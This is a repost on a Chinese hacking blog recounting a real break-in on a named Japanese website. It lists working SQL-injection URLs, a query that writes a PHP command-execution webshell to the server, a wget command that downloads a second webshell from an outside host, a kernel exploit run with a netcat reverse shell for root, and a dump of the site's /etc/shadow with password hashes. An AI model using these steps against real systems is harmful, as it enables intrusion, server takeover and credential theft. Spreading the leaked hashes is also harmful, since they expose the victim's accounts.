记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

n年前一个日本h站

2013-01-30 17:55

注入点: http://ciao.sc/select/goods_detail.php?id=48 猜解字段: http://ciao.sc/select/goods_detail.php?id=48%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10/*

http://ciao.sc/select/goods_detail.php?id=48%20and%201=2%20union%20select%20user(),2,3,4,5,6,7,8,9,10/*

goods_id=root@localhost root权限,有戏了。继续往下,

http://ciao.sc/select/goods_detail.php?id=48%20and%201=2%20union%20select%20load_file(char(47,101,116,99,47,112,97,115,115,119,100)),2,3,4,5,6,7,8,9,10/* 测试成功 http://ciao.sc/select/goods_detail.php?id=48%20and%201=2%20union%20select%20char(60,63,112,104,112,32,112,97,115,115,116,104,114,117,40,36,95,71,69,84,91,39,99,109,100,39,93,41,32,63,62),2,3,4,5,6,7,8,9,10 into outfile ‘/home/ciaosc/ciao.sc/xx.php’/*

http://ciao.sc/xx.php?cmd=ls -al

total 1224 drwxrwxrwx 13 root root 4096 Dec 11 12:52 . drwxr-xr-x 6 ciaosc ciaosc 4096 Feb 25 2009 .. -rw-r–r– 1 ciaosc ciaosc 2626 Aug 2 2008 ask.php -rw-r–r– 1 ciaosc ciaosc 993 Aug 2 2008 ask_cfg.php drwxr-xr-x 2 ciaosc ciaosc 4096 Dec 5 2008 banner -rw-r–r– 1 ciaosc ciaosc 6668 Apr 20 2009 business.html -rw-r–r– 1 ciaosc ciaosc 6408 Nov 19 2008 business_back.html drwxr-xr-x 2 ciaosc ciaosc 4096 Dec 28 2008 cgi-bin -rw-r–r– 1 ciaosc ciaosc 1150 Apr 15 2009 ciao_icon.ico drwxr-xr-x 16 ciaosc ciaosc 4096 Jul 20 23:00 contents

隐藏到其他位置,用wget上传个webshell http://ciao.sc/xx.php?cmd=/usr/bin/wget http://members.lycos.co.uk/gogopw/1QIqiQIcE4u.txt -O /home/ciaosc/ciao.sc/log/ctry_usage_200910.php

http://ciao.sc/log/ctry_usage_200910.php 1QIqiQIcE4u

提升一下权限。

uname -a

Linux localhost.localdomain 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 2007 i686 i686 i386 GNU/Linux

找个合适exp上传

tar -zxvf 2009-linux-sendpage3.tar.gz

exploit.c     exploit-pulseaudio.c     run     runcon-mmap_zero     sesearch-mmap_zero 到同一个目录下

chomd 777 run

反弹一个 shell 到本地

Back Connect 5786

nc -vv -l -p 5786

./run

socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Socket type not supported socket: Address family not supported by protocol sh: no job control in this shell

sh-3.1# id

uid=0(root) gid=0(root) groups=48(apache)

sh-3.1# cat /etc/shadow root:$1$B2qTsesO$wvPVDvnCUFtueQW58yi/H0:14046:0:99999:7::: bin:*:13992:0:99999:7::: daemon:*:13992:0:99999:7::: adm:*:13992:0:99999:7::: lp:*:13992:0:99999:7::: sync:*:13992:0:99999:7::: shutdown:*:13992:0:99999:7::: halt:*:13992:0:99999:7::: mail:*:13992:0:99999:7::: news:*:13992:0:99999:7::: uucp:*:13992:0:99999:7::: operator:*:13992:0:99999:7::: games:*:13992:0:99999:7::: gopher:*:13992:0:99999:7::: ftp:*:13992:0:99999:7::: nobody:*:13992:0:99999:7::: rpm:!!:13992:0:99999:7::: dbus:!!:13992:0:99999:7::: mailnull:!!:13992:0:99999:7::: smmsp:!!:13992:0:99999:7::: avahi:!!:13992:0:99999:7::: nscd:!!:13992:0:99999:7::: vcsa:!!:13992:0:99999:7::: rpc:!!:13992:0:99999:7::: rpcuser:!!:13992:0:99999:7::: nfsnobody:!!:13992:0:99999:7::: sshd:!!:13992:0:99999:7::: apache:!!:13992:0:99999:7::: pcap:!!:13992:0:99999:7::: ntp:!!:13992:0:99999:7::: haldaemon:!!:13992:0:99999:7::: xfs:!!:13992:0:99999:7::: distcache:!!:13992:0:99999:7::: postgres:!!:13992:0:99999:7::: mysql:!!:13992:0:99999:7::: dovecot:!!:13992:0:99999:7::: webalizer:!!:13992:0:99999:7::: squid:!!:13992:0:99999:7::: named:!!:13992:0:99999:7::: sabayon:!!:13992:0:99999:7::: y87t7ko7:$1$13612595$nz6ACIQYqw/jDjjNm/kx51:14046:::::: ciaosc:$1$13760939$D2lcyzy8k5bh0iDxsHuDv1:14048:::::: mob:$1$21533624$Ljio6Q8eJ1h2TsMhMsY5x0:14138::::::

知识来源: insight-labs.org/?p=713

阅读:203855 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“n年前一个日本h站”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

学习黑客技术,传播黑客文化

推广

工具

标签云